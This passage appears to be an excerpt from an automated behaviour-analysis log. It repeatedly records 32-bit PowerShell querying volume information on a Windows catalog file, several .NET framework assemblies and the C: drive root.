                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
